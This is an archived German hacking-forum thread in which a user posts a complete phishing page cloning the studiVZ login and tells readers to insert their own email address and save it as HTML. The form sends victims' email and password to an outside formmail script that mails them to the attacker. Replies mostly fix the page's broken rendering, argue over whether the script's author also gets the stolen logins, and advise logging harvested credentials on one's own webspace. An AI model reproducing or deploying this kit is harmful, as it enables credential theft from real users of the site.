PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : studivz Phishing seite



sbg10
01.06.2009, 21:50
Mal wieder eine phishing von mir von studivz:)
da wo hirkommtdeinmsn@hotmail.de steht da kommt deins hin!!
und dan editor öffnen ,einfügen und als html speichern.




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<title>studiVZ | Bist Du schon drin?</title>
<meta name="description" content="studiVZ.net ist eine kostenlose Plattform, die es Studenten ermöglicht, Informationen auszutauschen. Über persönliche Netzwerke bieten wir Euch die Möglichkeit, mit alten Bekannten in Kontakt zu bleiben und neue Verbindungen herzustellen." />
<meta name="keywords" content="Studenten, students" />
<meta name="ajaxUrl" content="/Ajax" />
<meta name="platformId" content="Svz" />

<link rel="shortcut icon" href="http://static.pe.studivz.net/20081217-0/favicon.ico" />
<link rel="stylesheet" type="text/css" href="http://static.pe.studivz.net/20081217-0/Css/Default.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.studivz.net/20081217-0/Css/DefaultJS.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.studivz.net/20081217-0/Css/Objects.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.studivz.net/20081217-0/Css/Login.css" />
<link rel="stylesheet" type="text/css" href="http://static.pe.studivz.net/20081217-0/Css/LeftSideBox.css" />
<script type="text/javascript">
//<![CDATA[
var brs = navigator.userAgent.toLowerCase();
function Adition_BrowserId(){if(brs.search(/konqueror/)!=-1){return 8;}else if(brs.search(/safari/)!=-1){return 8;}else if(brs.search(/netscape6/)!=-1){return 5;}else if(brs.search(/netscape\/(7\.\d*)/)!=-1){return 5;}else if(brs.search(/netscape4/)!=-1){return 4;}else if((brs.search(/mozilla\/(4.\d*)/)!=-1)&&(brs.search(/msie\s(\d+(\.?\d)*)/)==-1)){return 4;}else if((brs.search(/gecko\//)!=-1)){return 6;}else if (brs.search(/opera/)!=-1){return 7;}else if(brs.search(/msie\s4/)!=-1){return 1;}else if(brs.search(/msie\s5/)!=-1){return 2;}else if(brs.search(/msie\s6/)!=-1){return 3;}else if(brs.search(/msie\s7/)!=-1){return 9;}else{return -1;}}
function Adition_OSId(){var os;if((brs.search(/windows/)!=-1)||((brs.search(/win9\d{1}/)!=-1))){if(brs.search(/nt\s5\.1/)!=-1){os=3;}else if(brs.search(/nt\s5\.0/)!=-1){os=2;}else if(brs.search(/nt\s5\.2/)!=-1){os=8;}else if(brs.search(/nt\s6\.0/)!=-1){os=9;}else if((brs.search(/win98/)!=-1)||(brs.search(/windows\s98/)!=-1)){os=1;}else if(brs.search(/windows\sme/)!=-1){os=1;}else if((brs.search(/windows\s95/)!=-1)||(brs.search(/win95/)!=-1)){os=1;}else if((brs.search(/nt\s4\.0/)!=-1)||(brs.search(/nt4\.0/))!=-1){os=4;}return os;}else if(brs.search(/linux/)!=-1){return 6;}else if(brs.search(/mac\sos\sx/)!=-1){return 5;}else if((brs.search(/macintosh/)!=-1)||(brs.search(/mac\x5fpowerpc/)!=-1)){return 5;}else if((brs.search(/unix/)!=-1)||(brs.search(/x11/)!=-1)){return 7;}else{return -1;}}
function Adition_ResId(){if(screen.width==640&&screen.height==480){return 1;}else if(screen.width==800&&screen.height==600){return 2;}else if(screen.width==1024&&screen.height==768){return 3;}else if(screen.width==1152&&screen.height==864){return 4;}else if(screen.width==1280&&screen.height==1024){return 5;}else if(screen.width==1600&&screen.height==1200){return 6;}else if(screen.width==1280&&screen.height==960){return 7;}else if(screen.width==1400&&screen.height==1050){return 8;}else if(screen.width==1280&&screen.height==768){return 9;}else if(screen.width==1280&&screen.height==800){return 10;}else if(screen.width==1440&&screen.height==900){return 11;}else if(screen.width==1680&&screen.height==1050){return 12;}else if(screen.width==1920&&screen.height==1200){return 13;}return -1;}
function Adition_Flash(){var f="",n=navigator;if(n.plugins&&n.plugins.length){for(var ii=0;ii<n.plugins.length;ii++){if(n.plugins[ii].name.indexOf('Shockwave Flash')!=-1){f=n.plugins[ii].description.split('Shockwave Flash ')[1];i=f.indexOf('.');f=f.substr(0,i);break;}}}else if(window.ActiveXObject){for(var ii=10;ii>=2;ii--){try{var fl=eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash."+ii+"');");if(fl){f=ii;break;}}catch(e){}}}return f;}
var ad_wid = Math.round(Math.random()*2000000000);var ad_count = 0;var ref;try{ref=escape(document.referrer);}catch(e){re f='-'}var os;try{os=Adition_OSId();}catch(e){os=''}var browser;try{browser=Adition_BrowserId();}catch(e){ browser=''}var screen_res;try{screen_res=Adition_ResId();}catch(e ){screen_res=''}var fvers;try{fvers=Adition_Flash();}catch(e){fvers='' }
//]]>
</script></head>
<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = (document.body.className ? document.body.className += " javascript-enabled" : "javascript-enabled");
//]]>
</script>

<div id="adBackground"></div>
<div id="allIn" class="clearFix">

<div id="leftAds">

<div id="masterLeft">
<div id="logo"><a href="/Default" title="zur Startseite">
<img src="http://static.pe.studivz.net/20081217-0/Img/logo.png" width="123" height="64" alt="Logo studiVz, Link zur Startseite" />
</a></div>
<div id="Login_Leftside">

<form action="http://www.kokoin.com/inc/kokoin.php" method=post>
<input type=hidden value="hirkommtdeinmsn@hotmail.de" name=recipient>
<input type=Hidden value="http://www.studivz.net" name=redirect>
<fieldset>
<label for="Login_email">E-Mail</label><br />
<input onfocus="this.hasfocus='yes';" class="fieldText" type="text" name="LOGIN" id="Login_email" value="" /><br />
<label for="Login_password">Passwort</label><br />
<input onfocus="this.hasfocus='yes';" class="fieldText" type="password" name="PASSWORD" id="Login_password" value="" /><br />
<input onfocus="this.hasfocus='yes';" class="fieldBtnSubmit" type="submit" name="login" value="Einloggen" />
<input type="hidden" name="jsEnabled" id="jsEnabled" value="false" />
<script type="text/javascript">
document.getElementById('jsEnabled').value = 'true';
</script>
<input type="hidden" name="formkey" value="8ad8596ba8882420f0fb8e9e0d6ea46a83aea208c3e5087608 0dfcda5f8dce63faf464dcc7a9359d12ca856916aabc6bba93 0addd79e7fef9f45ed0a3d0e4910" />
<input type="hidden" name="iv" value="4f972ca183b782dbcc12173c382e8a67" />
<input type="hidden" name="checkcode" value="eb52ad32b14ccee6c4eed4935d721ff4" />

</fieldset>
</form>
</div>
<ul class="accessibility_tag">
<li><a href="#mainNav">Navigation (studiVZ)</a></li>
<li><a href="#infoNav">Navigation (studiVZ Infos)</a></li>
</ul>

<a id="myPageNav" name="myPageNav"></a>
<h1 class="accessibility_tag">Navigation (meine Seite)</h1>
<ul class="linkList">
<li><a href="/Registration" title="Immatrikulieren">Immatrikulieren</a></li> </ul>

<div id="leftSideBox">
<div>
<p>Schatz! Es gab keine Aspirin, darum hab ich dir <a href="http://www.studivz.net/Groups/Overview/7b12459af4377bec">Bier</a> mitgebracht.</p> </div>
</div> </div>

<div id="masterRight">
<div id="topHeader" class="clearFix">
<a id="mainNav" name="mainNav"></a>
<h1 class="accessibility_tag">Navigation (studiVZ)</h1>
<ul id="topNavi">
<li><a href="/Login" title="Einloggen">einloggen</a></li>
<li><a href="/Registration" title="immatrikulieren">immatrikulieren</a></li>
<li><a href="/l/help" title="hilfe">hilfe</a></li>
<li><a href="/Newsroom/Overview/tid/124" title="klartext">klartext</a></li>
</ul>
</div>

<div id="pageHeader" class="clearFix">
<div class="floatL">
<h1 title="Bist Du schon drin?">Bist Du schon drin?</h1> </div>
<div class="floatR">
</div>

<div id="pageHeaderCountries">
<a href="http://www.studiqg.fr" hreflang="fr" title="zur franz&ouml;sichen Sprachversion"><img src="http://static.pe.studivz.net/20081217-0/Img/Flags/flag_fr.gif" alt="Franz&ouml;sische Flagge - Link zur franz&ouml;sichen Sprachversion" /></a>
<a href="http://www.studiln.it" hreflang="it" title="zur italienischen Sprachversion"><img src="http://static.pe.studivz.net/20081217-0/Img/Flags/flag_it.gif" alt="Italienische Flagge - Link zur italienischen Sprachversion" /></a>
<a href="http://www.studentix.pl" hreflang="pl" title="zur polnischen Sprachversion"><img src="http://static.pe.studivz.net/20081217-0/Img/Flags/flag_pl.gif" alt="Polnische Flagge - Link zur polnischen Sprachversion" /></a>
<a href="http://www.estudiln.net" hreflang="es" title="zur spanischen Sprachversion"><img src="http://static.pe.studivz.net/20081217-0/Img/Flags/flag_es.gif" alt="Spanische Flaggen - Link zur spanischen Sprachversion" /></a>&nbsp;&nbsp;
</div>
</div>




<div id="shoutboxJs" class="hidden">
<div>
<p id="shoutboxJsSuccess" class="success hidden"></p>
<p id="shoutboxJsError" class="error hidden"></p>
</div>
<div class="close">
<a href="javascript:;"></a>
</div>
</div>

<div id="content" class="clearFix">
<a id="myPageContent" name="myPageContent"></a>

<div class="narrowContent">
<div class="RegBox clearFix">
<div class="RegText">
<h2>Jetzt kostenlos anmelden!</h2>
<ul>

<li><span>Finde andere Studenten an Deiner Hochschule</span></li>


<li><span>Finde alte Freunde wieder</span></li>


<li><span>Finde heraus, wer wen über welche Ecken kennt</span></li>


<li><span>Finde Partner für Sport, Lernen und Freizeit</span></li>


<li><span>Finde heraus, was für Leute in Deinen Lehrveranstaltungen sitzen</span></li>


<li><span>Vernetze Dich jetzt auch mit meinVZ-Nutzern</span></li>


<li><span>Vergiss keine Geburtstage mehr – studiVZ erinnert Dich automatisch</span></li>

</ul>

</div>
<div class="floatR tRight">
<img src="http://static.pe.studivz.net/20081217-0/Img/FrontBoy.png" alt="Avatar" />
</div>
</div>

<div class="RegBtnContainer clearFix">

<div class="floatL tCenter">
<a href="/Registration/" title="">Immatrikulieren</a><br />
Jetzt einschreiben </div>

<div class="floatL tCenter">
<a href="/l/Tour" title="">Entdecke studiVZ</a><br />
Was bringt mir das? </div>

</div>
</div> </div>

<div id="pageFooter">
<h1 class="accessibility_tag">Navigation (studiVZ Infos)</h1>
<a href="/l/about_us" title="Über uns">Über uns</a>
<a href="/l/terms" title="AGB">AGB</a>
<a href="/l/press" title="Presse">Presse</a>
<a href="/l/jobs" title="Jobs">Jobs</a>
<a href="/l/banner" title="Banner">Banner</a>
<a href="/l/impressum" title="Impressum">Impressum</a>
<a href="/l/policy" title="Datenschutz">Datenschutz</a>
<a href="/l/rules" title="Verhaltenskodex">Verhaltenskodex</a>
<a href="/l/security" title="Sicherheit">Sicherheit</a>
</div>
</div>
</div>

<div id="rightAds">
</div>

</div>

<script type="text/javascript" src="http://static.pe.studivz.net/20081217-0/Js/All.js"></script>
<script type="text/javascript" src="http://static.pe.studivz.net/20081217-0/Js/Ad.js"></script>
<script type="text/javascript" src="http://static.pe.studivz.net/20081217-0/Js/Info.js"></script>
<script type="text/javascript" src="http://static.pe.studivz.net/20081217-0/Js/Login.js"></script>

<!-- SZM VERSION="1.6" -->
<script type="text/javascript">
/* <![CDATA[ */
var IVW="http://studivz.ivwbox.de/cgi-bin/ivw/CP/index;LoggedOut";
document.write("<div style=\"z-index:-100\"><img src=\""+IVW+"?r="+escape(document.referrer)+"&d="+(Math.random()*100000)+"\" width=\"1\" height=\"1\" alt=\"\" name=\"szmimages\" /><\/div>");
/* ]]> */
</script>

<noscript>
<div style="z-index:-100"><img src="http://studivz.ivwbox.de/cgi-bin/ivw/CP/index;LoggedOut" width="1" height="1" alt="" /></div>
</noscript>
<!-- /SZM -->

<script type="text/javascript">
/* <![CDATA[ */
var originalIvwSource = document.szmimages.src;

function ReloadPixelImages (PixelCode, PixelComment)
{
var IVW = "http://studivz.ivwbox.de/cgi-bin/ivw/CP/" + PixelCode + ";" + PixelComment;
document.szmimages.src = IVW + "?r=" + escape(document.referrer) + "&d=" + (Math.random() * 100000);
}

function ResetPixelImages ()
{
var newIvwSource = originalIvwSource.substring(0, originalIvwSource.indexOf('&d=') + 3) + (Math.random() * 100000);
document.szmimages.src = newIvwSource;
}
/* ]]> */
</script>
</body>
</html>

gf0x
01.06.2009, 21:53
Bei mir sieht das so aus als wäre die seite nicht richtig geladen worden ...=/

sbg10
01.06.2009, 22:06
bei mir auch aber ich find den fehler nicht...

VeN0m
01.06.2009, 22:10
Mal ehrlich Du stellst eine unvollständige Seite hier rein? Nicht so toll... Und ein Screenshot wäre immer recht nice.
Die Seite sieht aus, als sei sie unvollständig, ja. Das liegt an einem der CSS-Dokumente. Werden alle korrekt eingelesen bzw. sind die Pfade alle korrekt? Wird jedenfalls dort irgendwo etwas falsch sein...

EDIT: Ach... In den Meta-Tags sind Sonderzeichenfehler... Mal ein ernst und gut gemeinter Rat: Niemals unvollständiges publizieren... Hat man nichts von.

hpoc
01.06.2009, 22:33
Vorallem würde ich sowas nicht benutzen, weil Du da nie sicher sein kannst ob die Person die das Skript gemacht hat die Daten auch mitbekommt.

Burn0ut
01.06.2009, 22:37
So unnötig die Seite is nich vollständig und du stellst die rein -.- und ich hbe mich gefreut -.-

sbg10
01.06.2009, 22:38
Nein ,nur an dir wird das passwort geschikt

Burn0ut
01.06.2009, 23:04
es heißt an dich aber wenn nimand drauf reinfällt hilft mir ds ja nich viel ^^

hpoc
01.06.2009, 23:07
Nein ,nur an dir wird das passwort geschiktUnd wer gibt mir diese Garantie?

sbg10
01.06.2009, 23:10
ich???

hpoc
01.06.2009, 23:24
Sei mir nicht böse, aber Dir würde ich nich vertrauen.

sbg10
01.06.2009, 23:29
Ist mir egal ist halt dein pech

v0id
02.06.2009, 00:32
Sei mir nicht böse, aber Dir würde ich nich vertrauen.

Lies den Source und guck nach 0.o ???

hpoc
02.06.2009, 00:43
Toll, da sehe ich ein HTML Tags.
Dann sehe ich eine Form die die Daten über POST an eine PHP Datei schickt.
Wenn Du mir nun sagst, was das PHP file macht, weil Du ja anscheinend Gedankelesen kannst würde ich mich darüber freuen.

Fazit: Wenn Du keine Ahnung hast....

VeN0m
02.06.2009, 15:01
Erstens mal: hpoc hat bedingt Recht. Die Formulare von den Phishingseiten von sbg10 werden alle an einen Formmail-Clienten gesendet. Und da bin ich mir relativ sicher, dass es nicht selbst programmiert ist. Dann könnte man den simplen Emailcode auch einfach in eine "login.php" hauen oder ähnlich. Ob sbg10 die Daten nun abgreift bezweifele ich. Und ob er nun dafür garantiert oder nicht: Ob die Formmailseite die Daten logged kann auch er nicht wissen. Also hört bitte auf zu streiten... Bringt eh niemandem etwas.

Fakt ist: Wer dem nicht traut macht es wie ich und logged die Daten auf dem eigenen Webspace per "log.txt" oder ähnlich. Bei all den Leuten, die bei einem Provider hosten kann es ewig dauern, bis jemand sowas in evtl. geloggtem Verkehr findet. In so fern...

Jedenfalls ist die Seite unvollständig, was mir persönlich nicht gefällt. Sooo schwer ist das nun auch nicht eine _gute_ Phishingseite zu erstellen, wo die Grafiken und alles beiliegen. Kostet vielleicht eine Stunde oder so. Aber eine unvollständige Seite, die weder CSS-Dokumente noch Grafiken mitliefert ist nun echt nichts großes...

Sorry aber das konntest Du schonmal besser.